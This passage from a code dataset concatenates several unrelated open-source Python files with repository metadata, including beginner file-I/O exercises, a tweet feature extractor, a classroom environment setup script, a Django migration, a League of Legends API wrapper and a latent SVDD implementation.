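    print(read_json(demo_path))
    shutil.rmtree(scratch)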
|
mit
| 8,000,063,582,081,847,000
| 32.472441
| 90
| 0.597389
| false
| 4.217262
| false
| false
| false
|
pepincho/playground
|
python/Learn-Python-The-Hard-Way/exercises11to20.py
|
1
|
2190
|
# exercise 11
name = input("What's your name? ") # take the name from the keyboard
print ("Your name is {}".format(name))
# exercise 15
file_again = input("Type the filename again: > ") # read the file's name from the keyboard
txt_again = open(file_again) # open the file
print (txt_again.read()) # print the file's content
# exercise 16
print ("Opening the file...")
target_name = input("Type the filename: > ")
target_txt = open(target_name, "r+")
print ("Now I'm going to ask you for three lines.")
line1 = input("line 1: ")
line2 = input("line 2: ")
line3 = input("line 3: ")
print ("I'm going to write these to the file.")
target_txt.write(line1)
target_txt.write("\n")
target_txt.write(line2)
target_txt.write("\n")
target_txt.write(line3)
target_txt.write("\n")
print ("And finally, we close it.")
target_txt.close()
# exercise 17: read from a file and write to another file
from os.path import exists
from_file = input("From file: > ")
to_file = input("To file: > ")
in_file = open(from_file)
indata = in_file.read()
print ("The input file is {} bytes long.".format(len(indata)))
print ("Does the output file exist? {}".format(exists(to_file)))
out_file = open(to_file, 'w')
out_file.write(indata)
print ("Alright, all done.")
out_file.close()
in_file.close()
# exercise 18
def print_two(*args):
arg1, arg2 = args
print ("arg1: %r, arg2: %r" % (arg1, arg2))
def print_two_again(arg1, arg2):
print ("arg1: %r, arg2: %r" % (arg1, arg2))
def print_none():
print ("I got nothin'.")
print_two("Zed","Shaw")
print_two_again("Zed","Shaw")
print_none()
# exercise 20
def print_all(f):
print (f.read())
def rewind(f):
f.seek(0)
def print_a_line(line_count, f):
print (line_count, f.readline())
file_name = input("File name: > ")
current_file = open(file_name)
print ("First let's print the whole file:\n")
print_all(current_file)
print ("Now let's rewind, kind of like a tape.")
print (rewind(current_file))
print ("Let's print three lines:")
current_line = 1
print_a_line(current_line, current_file)
current_line = current_line + 1
print_a_line(current_line, current_file)
current_line = current_line + 1
print_a_line(current_line, current_file)
|
mit
| -1,002,428,991,431,571,700
| 21.121212
| 90
| 0.67032
| false
| 2.807692
| false
| false
| false
|
bfontaine/Teebr
|
teebr/features.py
|
1
|
6724
|
# -*- coding: UTF-8 -*-
from __future__ import absolute_import, unicode_literals
import re
from json import dumps
from collections import defaultdict
from .log import mkLogger
from .text.utils import contains_emoji, extract_named_entities
from .text.utils import most_common_words
from .text.spam import is_spam
logger = mkLogger("features")
LANGUAGES = ('en',) # 'fr')
SOURCE_TYPES = {
"source_mobile": [
"Echofon",
"Mobile Web (M2)",
"Mobile Web (M5)",
"Mobile Web",
"Samsung Mobile",
"Twitter for Android",
"Twitter for BlackBerry®",
"Twitter for Windows Phone",
"Twitter for iPhone",
"Twitterrific",
"iOS",
"uberSocial for Android",
],
"source_tablet": [
"Twitter for Android Tablets",
"Twitter for iPad",
],
"source_desktop": [
"TweetDeck",
"Twitter Web Client",
"Twitter for Mac",
"OS X",
],
# automated publication tools + bot-like tweets
"source_autopub": [
"Buffer",
"Hootsuite",
"IFTTT",
"JustUnfollow",
"RoundTeam",
"TweetAdder v4",
"fllwrs",
"twittbot.net",
],
"source_social": [
"Ask.fm",
"Facebook",
"Foursquare",
"Instagram",
"LinkedIn",
"Path",
"Pinterest",
"Reddit RSS",
"Vine - Make a Scene",
"Vine for Android",
],
"source_news": [
"Nachrichten News",
],
"source_other": [],
}
URL_TYPES = {
"url_social": [
"fb.me",
"path.com",
],
"url_social_media": [
"vine.co",
"instagram.com",
],
"url_product": [
"amzn.to",
],
"url_video": [
"youtu.be",
],
}
# TODO we might be able to remove this now that we have a spam filter
APPS_BLACKLIST = set([
# followers spam
u"Unfollowers",
u"JustUnfollow",
u"fllwrs",
u"..ignite.v.1.",
u"Adi Sumardiyasa",
u"Who Unfollowed Me",
# tweets ranking
u"001FM Top40 Tweets",
# Games
u"1Dreamboy 2 Game",
u"1Dreamboy Version 2 Game",
u"Airport City Mobile",
u"The Tribez HD on iOS",
# General news
u"233Live Tweets",
u"247newz",
# Misc news
u"ADVFN News Alert",
u"APD Traffic Alerts",
# Buzzfeed-like
u"75325love",
u"AlltheGoss",
u"AllHealthSecrets.com",
u"Amusing information",
u"volkanc",
u"awe.sm",
# nsfw
u"definebabecom",
u"Cumagination Gay",
u"Cumagination Lesbian",
u"EscortGuidexXx",
u"TweetAdder v",
# Misc Spam
u";sdklafjas",
u"Acne-Treatments-and-Tips.com",
u"AmazonRecommend",
# Others
u"Adcourier",
])
# some apps add numbers at the end, e.g. MySpam, MySpam1, MySpam2, etc
END_DIGITS = re.compile(r"\s*\d+$")
entity_keys = ("urls", "hashtags", "user_mentions", "trends", "symbols", "media")
def filter_status(st):
"""
Check if we should include a status as returned by the Streaming API in our
DB. It'll return ``False`` if it should be rejected.
"""
# keep only some languages
if st.lang not in LANGUAGES:
return False
# remove replies
if st.in_reply_to_screen_name:
return False
# remove RTs
if getattr(st, 'retweeted_status', False):
return False
# remove suspicious apps
if not st.source or not st.source_url:
return False
# remove spam apps
if END_DIGITS.sub("", st.source) in APPS_BLACKLIST:
return False
# remove manual RTs
if st.text.startswith("RT @") or st.text.startswith("MT @"):
return False
# remove manual responses
if st.text.startswith(".@"):
return False
# remove other spam tweets
if is_spam(st.text):
return False
# ok
return True
class FeaturesDict(defaultdict):
def __init__(self, st):
super(FeaturesDict, self).__init__(float)
self._st = st
def compute_features(self):
"""
Compute all features for this tweet
"""
self._set_source_type()
self._set_extra_entities()
st = self._st
self["sg_geolocalized"] = float(st.geo is not None)
self["sg_lang_%s" % st.lang] = 1.0
self["sg_contributors"] = float(st.contributors is not None)
self["sg_emojis"] = contains_emoji(st.text)
# some statuses don't have this attribute
self["sg_nsfw"] = getattr(st, "possibly_sensitive", 0.0)
entities = extract_named_entities(st.text)
self["names"] = ",".join(entities)
for entity in entities:
entity = entity.lower()
if entity in most_common_words:
self["sg_mc_word_%s" % entity] = 1.0
self["retweet_count"] = getattr(st, "retweet_count", 0.0)
self["favorite_count"] = getattr(st, "favorite_count", 0.0)
        for key in entity_keys:
            self["sg_%s" % key] = int(bool(self._st.entities.get(key)))
def _set_source_type(self):
"""
Feature: source type
Keys: source_mobile, source_desktop, source_autopub, source_social,
source_tablet, source_other, ... (see SOURCE_TYPES)
Values: [0, 1]
"""
text = self._st.source.strip()
for s,vs in SOURCE_TYPES.items():
if text in vs:
self["sg_%s" % s] = 1.0
return
ltext = text.lower()
for brand in ("android", "iphone", "blackberry", "windows phone"):
if ltext.endswith(" for %s" % brand):
self["sg_source_mobile"] = 1.0
return
self["sg_source_others"] = 1.0
def _set_extra_entities(self):
extra = {}
media = getattr(self._st, "entities", {}).get("media", [])
if media:
photos = []
for m in media:
# TODO check the format for videos
if m.get("type") != "photo":
continue
photos.append({
# The image URL
"media_url": m["media_url_https"],
# The URL included in the status (expanded by us)
"url": m["expanded_url"],
})
extra["photos"] = photos
self["extra_entities"] = dumps(extra)
def compute_features(status):
expand_urls(status)
f = FeaturesDict(status)
f.compute_features()
return f
def expand_urls(st):
entities = getattr(st, "entities", {})
for link in entities.get("urls", []) + entities.get("media", []):
st.text = st.text.replace(link["url"], link["expanded_url"])
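# Usage sketch (illustrative addition, not part of the original module).
# compute_features expects a tweepy-like status object; the stub below fakes
# only the attributes that FeaturesDict and expand_urls actually read, and it
# assumes the .text helpers imported above are functional in this environment.
if __name__ == "__main__":
    class FakeStatus(object):
        text = "Just a plain test tweet"
        lang = "en"
        geo = None
        contributors = None
        source = "Twitter Web Client"
        entities = {key: [] for key in entity_keys}

    print(dict(compute_features(FakeStatus())))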
|
mit
| -323,460,344,605,223,000
| 22.840426
| 81
| 0.542466
| false
| 3.519895
| false
| false
| false
|
jabez007/Training_Helpyr
|
Setup/__init__.py
|
1
|
7646
|
import re
import os
APP_PATH = os.path.join(*os.path.split(os.path.dirname(os.path.realpath(__file__)))[:-1])
import sys
if APP_PATH not in sys.path:
sys.path.append(APP_PATH)
import MyTrack
import PowerShell
import Phonebook
import Overlord
import Log
LOGGER = Log.MyLog(name=__name__)
# # # #
"""
Special setup for Care Everywhere 101 (fka CE-500)
"""
def ce500(instructor, trainees, code="CSCce500setup"):
"""
entry point for setting up CE 101 (FKA CE500)
:param instructor: <string> the cache environment for the Instructor
:param trainees: <string> the cache environments for the trainees
:param code: <string> the Overlord tag the needs to be ran in each environment to complete setup
:return: <bool> True if everything was successful
"""
gwn = None
instr = "".join([c for c in instructor if c.isdigit()])
trns = clean_caches(trainees)
if instr:
'''
if this is a fresh class setup, as in we are not just adding trainee environments to an existing class
'''
# pull out the last trainee environment and make it GWN
gwn = trns[-1:]
if gwen(gwn):
# then take that environment out of the list we'll set up later
trns = trns[:-1]
LOGGER.info("epic-trn%s set up as GWN environment" % gwn[0])
else:
# otherwise, skip the GWN setup and make this a normal environment
gwn = None
LOGGER.error("Galaxy Wide Network not set up")
setup_instructor(instr)
# Connect Interconnects to trainee environments
if not assign_interconnects("CE500", trns):
return False
# Update Training Phone Book with new environment assignments
if not update_phonebook(trns):
return False
    # Restart the Training Phone Book so our changes take effect
if not PowerShell.restart_phonebook():
LOGGER.error("Error in restarting Training Phonebook Interconnect")
return False
# Run Cache setup script
if not setup_cache([instr]+trns, code):
return False
if gwn is not None:
setup_cache(gwn, code, "GWeN")
return True
def setup_instructor(instructor):
"""
runs the setup particular to the instructor environment
:param instructor: <string> the cache environment for the class instructor
    :return: <bool> True if everything was successful
"""
# Connect Interconnect to instructor environment
if not PowerShell.setup('01', instructor):
LOGGER.error("Failed to connect epic-trn%s to CE500 instructor Interconnect. See powershell.err" % instructor)
return False
# Save to tracking database
if not MyTrack.assign("Instructors", "train01", "epic-trn"+instructor):
LOGGER.error("Setup between CE500 instructor Interconnect and epic-trn%s not saved to database. See my_track.err"
% instructor)
# Reset TRN Phonebook and register Instructor environment
if not Phonebook.TrnPhonebook().instructor(instructor):
LOGGER.error("Error in registering epic-trn%s as the Instructor environment in the Training Phonebook. See TRNphonebook.err"
% instructor)
return False
LOGGER.info("epic-trn%s set up as instructor environment" % instructor)
return True
def update_phonebook(trainees):
"""
updates the training Phonebook with trainee environments for this class
:param trainees: <list(string)> the cache environments for the trainees
:return: <bool> True if everything was successful
"""
for cache in trainees:
if not Phonebook.TrnPhonebook().register(cache):
LOGGER.error("Error in registering epic-trn%s with Training Phonebook. See TRNphonebook.err" % cache)
return False
LOGGER.info("Trainee environments registered in phonebook")
return True
def gwen(trainee):
"""
runs the setup particular to the Galaxy Wide Network environment
:param trainee: <string> the cache environment for GWN
:return: <bool> True if everything was successful
"""
# assign interconnect - this should be the same as the other trainee environments
assign_interconnects("CE500", trainee)
# update Phonebook
if not Phonebook.TrnPhonebook().register_gwn(trainee[0]):
return False
# setup cache for GWN with the other environments
return True
# # # #
"""
Generic Care Everywhere setup for IP and AMB Funds classes
"""
def funds(caches, code="CSCInpFunds"):
"""
:param caches: <string>
:param code: <string>
:return: <bool>
"""
trns = clean_caches(caches)
if not assign_interconnects("AMB_IP", trns):
return False
if code:
if not setup_cache(trns, code):
return False
return True
# # # #
"""
used by both Care Everywhere 101 and IP/AMB Funds
"""
def clean_caches(caches):
"""
uses regex to parse out our cache environments passed in
:param caches: <string>
:return: <list(string)>
"""
return_caches = list()
data = re.finditer("([a-zA-Z0-9\-]+)", caches)
for d in data:
cache = "".join([s for s in d.group(1) if s.isdigit()])
# make sure we have an environment and that it's not already assigned
if cache and not MyTrack.check_assigned(cache):
return_caches.append(cache)
return return_caches
def assign_interconnects(_class, trns):
assigned_interconnects = 1 # CE500 instructor always gets Interconnect 1
clss = _class
for cache in trns:
# #
if ("CE500" in _class) and (assigned_interconnects >= 40): # if training overbooks us, steal from FUNDs
clss = "AMB_IP"
interconnect = "".join([s for s in MyTrack.get("unassigned", "AMB_IP") if s.isdigit()])
else:
interconnect = "".join([s for s in MyTrack.get("unassigned", _class) if s.isdigit()])
# #
if interconnect:
if not PowerShell.setup(interconnect, cache):
LOGGER.error("Powershell failed to connect epic-trn%s to train%s" % (cache, interconnect))
return False
assigned_interconnects += 1
if not MyTrack.assign(clss, "train"+interconnect, "epic-trn"+cache):
LOGGER.error("Setup between epic-trn%s and train%s not saved to MyTrack" % (cache, interconnect))
return False
else:
LOGGER.error("No Interconnect returned from MyTrack for epic-trn%s" % cache)
return False
LOGGER.info("epic-trn%s connected to Interconnect-train%s" % (cache, interconnect))
return True
def setup_cache(trns, code, flag=""):
success = True
for trn in trns:
if not Overlord.overlord(trn, code, flag):
LOGGER.error("Error running %s. See Overlord logs" % code)
success = False
# LOGGER.info("%s successfully ran in %s" % (code, ", ".join(trns)))
return success
# # # #
if __name__ == "__main__":
import datetime
import Outlook
for days in range(2): # setup today's and tomorrow's classes
tomorrow = (datetime.datetime.now() + datetime.timedelta(days=days)).strftime("%m/%d/%Y") # MM/DD/YYYY
print("Setting up classes for %s:" % tomorrow)
classes = MyTrack.setup_schedule(tomorrow)
for new_class in classes:
if funds(new_class[0]):
print("\t%s - email to %s" % (new_class[0], new_class[1]))
Outlook.send_email(e_address=new_class[1], env=new_class[0])
else:
print("\t%s failed" % new_class[0])
|
mit
| -4,601,870,185,056,420,400
| 31.675214
| 132
| 0.639681
| false
| 3.836427
| false
| false
| false
|
aricaldeira/PySPED
|
pysped/cte/webservices_flags.py
|
1
|
2161
|
# -*- coding: utf-8 -*-
#
# PySPED - Python libraries to deal with Brazil's SPED Project
#
# Copyright (C) 2010-2012
# Copyright (C) Aristides Caldeira <aristides.caldeira at tauga.com.br>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Library General Public License as
# published by the Free Software Foundation, either version 2.1 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# PySPED - Bibliotecas Python para o
# SPED - Sistema Público de Escrituração Digital
#
# Copyright (C) 2010-2012
# Copyright (C) Aristides Caldeira <aristides.caldeira arroba tauga.com.br>
#
# Este programa é um software livre: você pode redistribuir e/ou modificar
# este programa sob os termos da licença GNU Library General Public License,
# publicada pela Free Software Foundation, em sua versão 2.1 ou, de acordo
# com sua opção, qualquer versão posterior.
#
# Este programa é distribuido na esperança de que venha a ser útil,
# porém SEM QUAISQUER GARANTIAS, nem mesmo a garantia implícita de
# COMERCIABILIDADE ou ADEQUAÇÃO A UMA FINALIDADE ESPECÍFICA. Veja a
# GNU Library General Public License para mais detalhes.
#
# Você deve ter recebido uma cópia da GNU Library General Public License
# juntamente com este programa. Caso esse não seja o caso, acesse:
# <http://www.gnu.org/licenses/>
#
from __future__ import division, print_function, unicode_literals
from ..nfe.webservices_flags import UF_CODIGO, CODIGO_UF
WS_CTE_AUTORIZACAO = 0
WS_CTE_CONSULTA_AUTORIZACAO = 1
WS_CTE_INUTILIZACAO = 1
WS_CTE_CONSULTA = 3
WS_CTE_SITUACAO = 4
WS_CTE_RECEPCAO_EVENTO = 2
WS_CTE_RECEPCAO_OS = 5
WS_CTE_DISTRIBUICAO = 6
CTE_AMBIENTE_PRODUCAO = 1
CTE_AMBIENTE_HOMOLOGACAO = 2
|
lgpl-2.1
| -2,877,343,729,118,594,600
| 36.54386
| 76
| 0.757944
| false
| 2.801047
| false
| false
| false
|
sunoru/pokemon_only
|
stall/migrations/0001_initial.py
|
1
|
6359
|
# Generated by Django 2.2.2 on 2019-06-04 21:16
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pmo', models.CharField(choices=[('unknown', 'unknown'), ('pmo2015', 'pmo2015'), ('pmo2016', 'pmo2016'), ('pmo2017', 'pmo2017'), ('pmo2018', 'pmo2018'), ('pmo2019', 'pmo2019')], default='unknown', help_text='漫展', max_length=10)),
('validated', models.BooleanField(default=False)),
('name', models.CharField(default='未命名', max_length=50)),
('item_type', models.CharField(default='', help_text='种类', max_length=20)),
('content', models.CharField(default='', help_text='内容', max_length=100)),
('price', models.FloatField(default=0, help_text='价格')),
('url', models.URLField(default='', help_text='链接')),
('authors', models.TextField(default='', help_text='作者名单')),
('introduction', models.TextField(default='', help_text='简介')),
('cover_image', models.ImageField(help_text='封面图片', max_length=1024, null=True, upload_to='items/%Y/%m/%d')),
('forto', models.CharField(default='', help_text='面向人群', max_length=20)),
('is_restricted', models.CharField(default='', help_text='限制级是否', max_length=20)),
('circle', models.CharField(default='', help_text='出品社团', max_length=40)),
('is_started_with', models.BooleanField(default=False, help_text='是否首发')),
('item_order', models.IntegerField(default=0, help_text='商品排序')),
],
options={
'ordering': ['seller'],
},
),
migrations.CreateModel(
name='Option',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('key', models.CharField(max_length=255, unique=True)),
('value', models.TextField(default='')),
],
),
migrations.CreateModel(
name='Seller',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pmo', models.CharField(choices=[('unknown', 'unknown'), ('pmo2015', 'pmo2015'), ('pmo2016', 'pmo2016'), ('pmo2017', 'pmo2017'), ('pmo2018', 'pmo2018'), ('pmo2019', 'pmo2019')], default='unknown', help_text='漫展', max_length=10)),
('email', models.EmailField(max_length=30, verbose_name='email address')),
('is_active', models.BooleanField(default=False, help_text='是否激活')),
('signup_datetime', models.DateTimeField(auto_now=True)),
('signup_address', models.GenericIPAddressField()),
('is_stall', models.BooleanField(help_text='是否摊位')),
('circle_name', models.CharField(help_text='社团名', max_length=40)),
('circle_description', models.TextField(help_text='社团介绍')),
('circle_image', models.ImageField(help_text='社团图标', upload_to='circle/%Y/%m/%d')),
('seller_id', models.CharField(default='', help_text='摊位号', max_length=10)),
('proposer_name', models.CharField(help_text='申请人姓名', max_length=20)),
('proposer_sex', models.CharField(help_text='性别', max_length=20)),
('proposer_qq', models.CharField(help_text='QQ', max_length=11)),
('proposer_phone', models.CharField(help_text='电话', max_length=20)),
('proposer_id', models.CharField(help_text='身份证号', max_length=18)),
('booth', models.FloatField(default=1, help_text='申请摊位数')),
('number_of_people', models.SmallIntegerField(default=1, help_text='申请人数')),
('remarks', models.TextField(default='', help_text='备注')),
('status', models.IntegerField(help_text='状态')),
('notice', models.TextField(default='', help_text='通知')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ValidateCode',
fields=[
('pmo', models.CharField(choices=[('unknown', 'unknown'), ('pmo2015', 'pmo2015'), ('pmo2016', 'pmo2016'), ('pmo2017', 'pmo2017'), ('pmo2018', 'pmo2018'), ('pmo2019', 'pmo2019')], default='unknown', help_text='漫展', max_length=10)),
('code', models.CharField(max_length=20, primary_key=True, serialize=False)),
('validated', models.BooleanField(default=False)),
('seller', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stall.Seller')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ItemPicture',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pmo', models.CharField(choices=[('unknown', 'unknown'), ('pmo2015', 'pmo2015'), ('pmo2016', 'pmo2016'), ('pmo2017', 'pmo2017'), ('pmo2018', 'pmo2018'), ('pmo2019', 'pmo2019')], default='unknown', help_text='漫展', max_length=10)),
('picture', models.ImageField(help_text='图片', max_length=1024, upload_to='items/%Y/%m/%d')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stall.Item')),
],
),
migrations.AddField(
model_name='item',
name='seller',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stall.Seller'),
),
]
|
gpl-2.0
| -6,446,297,086,749,532,000
| 59.343137
| 246
| 0.560845
| false
| 3.61421
| false
| false
| false
|
meraki-analytics/cassiopeia
|
cassiopeia/cassiopeia.py
|
1
|
6069
|
from typing import List, Set, Dict, Union, TextIO
import arrow
import datetime
from .data import Region, Queue, Season, Tier, Division, Position
from .core import Champion, Summoner, ChampionMastery, Rune, Item, Match, Map, SummonerSpell, Realms, ProfileIcon, LanguageStrings, CurrentMatch, ShardStatus, Versions, MatchHistory, Champions, ChampionMasteries, Runes, Items, SummonerSpells, Maps, FeaturedMatches, Locales, ProfileIcons, ChallengerLeague, GrandmasterLeague, MasterLeague, League, LeagueSummonerEntries, LeagueEntries, Patch, VerificationString, ChampionRotation
from .datastores import common as _common_datastore
from ._configuration import Settings, load_config, get_default_config
from . import configuration
# Settings endpoints
def apply_settings(config: Union[str, TextIO, Dict, Settings]):
if not isinstance(config, (Dict, Settings)):
config = load_config(config)
if not isinstance(config, Settings):
settings = Settings(config)
else:
settings = config
# Load any plugins after everything else has finished importing
import importlib
for plugin in settings.plugins:
imported_plugin = importlib.import_module("cassiopeia.plugins.{plugin}.monkeypatch".format(plugin=plugin))
print_calls(settings._Settings__default_print_calls, settings._Settings__default_print_riot_api_key)
# Overwrite the old settings
configuration._settings = settings
# Initialize the pipeline immediately
_ = configuration.settings.pipeline
def set_riot_api_key(key: str):
configuration.settings.set_riot_api_key(key)
def set_default_region(region: Union[Region, str]):
configuration.settings.set_region(region)
def print_calls(calls: bool, api_key: bool = False):
_common_datastore._print_calls = calls
_common_datastore._print_api_key = api_key
# Data endpoints
def get_league_entries(summoner: Summoner) -> LeagueEntries:
return summoner.league_entries
def get_paginated_league_entries(queue: Queue, tier: Tier, division: Division, region: Union[Region, str] = None) -> LeagueEntries:
return LeagueEntries(region=region, queue=queue, tier=tier, division=division)
def get_master_league(queue: Union[Queue, int, str], region: Union[Region, str] = None) -> MasterLeague:
return MasterLeague(queue=queue, region=region)
def get_grandmaster_league(queue: Union[Queue, int, str], region: Union[Region, str] = None) -> GrandmasterLeague:
return GrandmasterLeague(queue=queue, region=region)
def get_challenger_league(queue: Union[Queue, int, str], region: Union[Region, str] = None) -> ChallengerLeague:
return ChallengerLeague(queue=queue, region=region)
def get_match_history(summoner: Summoner, begin_index: int = None, end_index: int = None, begin_time: arrow.Arrow = None, end_time: arrow.Arrow = None, queues: Set[Queue] = None, seasons: Set[Season] = None, champions: Set[Champion] = None):
return MatchHistory(summoner=summoner, begin_index=begin_index, end_index=end_index, begin_time=begin_time, end_time=end_time, queues=queues, seasons=seasons, champions=champions)
def get_match(id: int, region: Union[Region, str] = None) -> Match:
return Match(id=id, region=region)
def get_featured_matches(region: Union[Region, str] = None) -> FeaturedMatches:
return FeaturedMatches(region=region)
def get_current_match(summoner: Summoner, region: Union[Region, str] = None) -> CurrentMatch:
return CurrentMatch(summoner=summoner, region=region)
def get_champion_masteries(summoner: Summoner, region: Union[Region, str] = None) -> ChampionMasteries:
return ChampionMasteries(summoner=summoner, region=region)
def get_champion_mastery(summoner: Summoner, champion: Union[Champion, int, str], region: Union[Region, str] = None) -> ChampionMastery:
return ChampionMastery(champion=champion, summoner=summoner, region=region)
def get_summoner(*, id: str = None, account_id: str = None, name: str = None, region: Union[Region, str] = None) -> Summoner:
return Summoner(id=id, account_id=account_id, name=name, region=region)
def get_champion(key: Union[str, int], region: Union[Region, str] = None) -> Champion:
return get_champions(region=region)[key]
def get_champions(region: Union[Region, str] = None) -> Champions:
return Champions(region=region)
def get_runes(region: Union[Region, str] = None) -> Runes:
return Runes(region=region)
def get_summoner_spells(region: Union[Region, str] = None) -> SummonerSpells:
return SummonerSpells(region=region)
def get_items(region: Union[Region, str] = None) -> Items:
return Items(region=region)
def get_maps(region: Union[Region, str] = None) -> Maps:
return Maps(region=region)
def get_profile_icons(region: Union[Region, str] = None) -> ProfileIcons:
return ProfileIcons(region=region)
def get_realms(region: Union[Region, str] = None) -> Realms:
return Realms(region=region)
def get_status(region: Union[Region, str] = None) -> ShardStatus:
return ShardStatus(region=region)
def get_language_strings(region: Union[Region, str] = None) -> LanguageStrings:
return LanguageStrings(region=region)
def get_locales(region: Union[Region, str] = None) -> List[str]:
return Locales(region=region)
def get_versions(region: Union[Region, str] = None) -> List[str]:
return Versions(region=region)
def get_version(date: datetime.date = None, region: Union[Region, str] = None) -> Union[None, str]:
versions = get_versions(region)
if date is None:
return versions[0]
else:
patch = Patch.from_date(date, region=region)
for version in versions:
if patch.majorminor in version:
return version
return None
def get_verification_string(summoner: Summoner) -> VerificationString:
return VerificationString(summoner=summoner)
def get_champion_rotations(region: Union[Region, str] = None) -> ChampionRotation:
return ChampionRotation(region=region)
# Pipeline
def _get_pipeline():
return configuration.settings.pipeline
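# Usage sketch (illustrative addition, not part of the original module).
# The API key below is a placeholder, not a real credential; substitute your
# own key and a summoner name that exists on the chosen shard.
if __name__ == "__main__":
    set_riot_api_key("RGAPI-your-key-here")
    set_default_region(Region.north_america)
    summoner = get_summoner(name="Kalturi", region="NA")
    print(summoner.level)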
|
mit
| 2,522,235,741,749,909,500
| 35.341317
| 429
| 0.731257
| false
| 3.276998
| true
| false
| false
|
sk413025/tilitools
|
latentsvdd.py
|
1
|
3222
|
from cvxopt import matrix,spmatrix,sparse,uniform,normal,setseed
from cvxopt.blas import dot,dotu
from cvxopt.solvers import qp
from cvxopt.lapack import syev
import numpy as np
import math as math
from kernel import Kernel
from svdd import SVDD
from ocsvm import OCSVM
import pylab as pl
import matplotlib.pyplot as plt
class LatentSVDD:
""" Latent variable support vector data description.
Written by Nico Goernitz, TU Berlin, 2014
For more information see:
'Learning and Evaluation with non-i.i.d Label Noise'
Goernitz et al., AISTATS & JMLR W&CP, 2014
"""
PRECISION = 10**-3 # important: effects the threshold, support vectors and speed!
C = 1.0 # (scalar) the regularization constant > 0
sobj = [] # structured object contains various functions
# i.e. get_num_dims(), get_num_samples(), get_sample(i), argmin(sol,i)
sol = [] # (vector) solution vector (after training, of course)
def __init__(self, sobj, C=1.0):
self.C = C
self.sobj = sobj
def train_dc(self, max_iter=50):
""" Solve the LatentSVDD optimization problem with a
sequential convex programming/DC-programming
approach:
Iteratively, find the most likely configuration of
the latent variables and then, optimize for the
model parameter using fixed latent states.
"""
N = self.sobj.get_num_samples()
DIMS = self.sobj.get_num_dims()
# intermediate solutions
# latent variables
latent = [0]*N
sol = 10.0*normal(DIMS,1)
psi = matrix(0.0, (DIMS,N)) # (dim x exm)
old_psi = matrix(0.0, (DIMS,N)) # (dim x exm)
threshold = 0
obj = -1
iter = 0
# terminate if objective function value doesn't change much
while iter<max_iter and (iter<2 or sum(sum(abs(np.array(psi-old_psi))))>=0.001):
print('Starting iteration {0}.'.format(iter))
print(sum(sum(abs(np.array(psi-old_psi)))))
iter += 1
old_psi = matrix(psi)
# 1. linearize
# for the current solution compute the
# most likely latent variable configuration
for i in range(N):
# min_z ||sol - Psi(x,z)||^2 = ||sol||^2 + min_z -2<sol,Psi(x,z)> + ||Psi(x,z)||^2
# Hence => ||sol||^2 - max_z 2<sol,Psi(x,z)> - ||Psi(x,z)||^2
(foo, latent[i], psi[:,i]) = self.sobj.argmax(sol, i, opt_type='quadratic')
# 2. solve the intermediate convex optimization problem
kernel = Kernel.get_kernel(psi,psi)
svdd = SVDD(kernel, self.C)
svdd.train_dual()
threshold = svdd.get_threshold()
inds = svdd.get_support_dual()
alphas = svdd.get_support_dual_values()
sol = psi[:,inds]*alphas
self.sol = sol
self.latent = latent
return (sol, latent, threshold)
def apply(self, pred_sobj):
""" Application of the LatentSVDD:
anomaly_score = min_z ||c*-\Psi(x,z)||^2
latent_state = argmin_z ||c*-\Psi(x,z)||^2
"""
N = pred_sobj.get_num_samples()
norm2 = self.sol.trans()*self.sol
vals = matrix(0.0, (1,N))
lats = matrix(0.0, (1,N))
for i in range(N):
# min_z ||sol - Psi(x,z)||^2 = ||sol||^2 + min_z -2<sol,Psi(x,z)> + ||Psi(x,z)||^2
# Hence => ||sol||^2 - max_z 2<sol,Psi(x,z)> - ||Psi(x,z)||^2
(max_obj, lats[i], foo) = pred_sobj.argmax(self.sol, i, opt_type='quadratic')
vals[i] = norm2 - max_obj
return (vals, lats)
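# Usage sketch (illustrative addition, not part of the original module).
# LatentSVDD is generic over the structured object; the toy object below uses
# an identity feature map with a single (trivial) latent state, and assumes
# the bundled Kernel and SVDD modules work as imported above.
if __name__ == '__main__':
    class ToySObj:
        def __init__(self, X):
            self.X = matrix(X)  # (dims x samples)
        def get_num_samples(self):
            return self.X.size[1]
        def get_num_dims(self):
            return self.X.size[0]
        def argmax(self, sol, i, opt_type='quadratic'):
            psi = self.X[:, i]
            # max_z 2<sol,Psi(x,z)> - ||Psi(x,z)||^2 with a single state z=0
            return (2.0*dot(sol, psi) - dot(psi, psi), 0, psi)

    setseed(0)
    lsvdd = LatentSVDD(ToySObj(normal(2, 20)), C=0.5)
    (sol, latent, threshold) = lsvdd.train_dc(max_iter=10)
    (scores, states) = lsvdd.apply(ToySObj(normal(2, 5)))
    print('threshold={0}, scores={1}'.format(threshold, list(scores)))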
|
mit
| -4,128,180,928,146,153,500
| 29.396226
| 86
| 0.646182
| false
| 2.685
| false
| false
| false
|
sniemi/SamPy
|
sandbox/src1/pviewer/pviewer.py
|
1
|
31336
|
#!/usr/bin/env python
from tkFileDialog import *
from Tkinter import *
from tkSimpleDialog import Dialog
import tkMessageBox
from plotAscii import *
from imageUtil import *
from view2d import *
from mdaAscii import *
import Pmw
import os, string
import AppShell
global Scan
global SH # SHARED
class setupPrinter(Dialog):
"Dialog for setting up printer "
def body(self,master):
self.title("Set Printer Dialog")
Label(master, text='Enter Printer Name:').grid(row=1, sticky=W)
self.label = StringVar()
